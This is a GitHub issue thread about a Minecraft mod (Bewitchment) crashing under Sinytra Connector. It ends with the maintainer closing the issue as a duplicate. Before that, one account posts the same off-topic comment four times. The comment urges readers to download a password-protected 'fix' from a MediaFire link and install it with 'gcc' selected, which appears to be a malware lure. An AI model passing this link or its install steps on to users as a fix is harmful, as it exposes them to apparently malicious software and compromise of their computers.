### ISSUE TITLE
so I need help finding a fix for this

### ISSUE THREAD

**Issue by UwUsheep** [Sinytra/Connector#1364] opened 2024-08-27 03:09 UTC
### Mod Name

Bewitchment

### Mod Homepage

https://www.curseforge.com/minecraft/mc-mods/bewitchment

### Minecraft version

1.20.1 (LTS)

### Describe the bug

so game crashes when it launches due to mixin error

### Steps to reproduce

1.download mods
2.launch game
3.
...

### Logs

[debug-5.log](https://github.com/user-attachments/files/16755962/debug-5.log)

**Comment by amir1387aht** [comment] 2024-08-27 03:11
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 03:11
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 03:11
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 03:15
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Su5eD** [comment] 2024-08-27 14:26
Duplicate of #1164

**Closed as not planned by Su5eD** 2024-08-27 14:26 UTC
Labels: duplicate
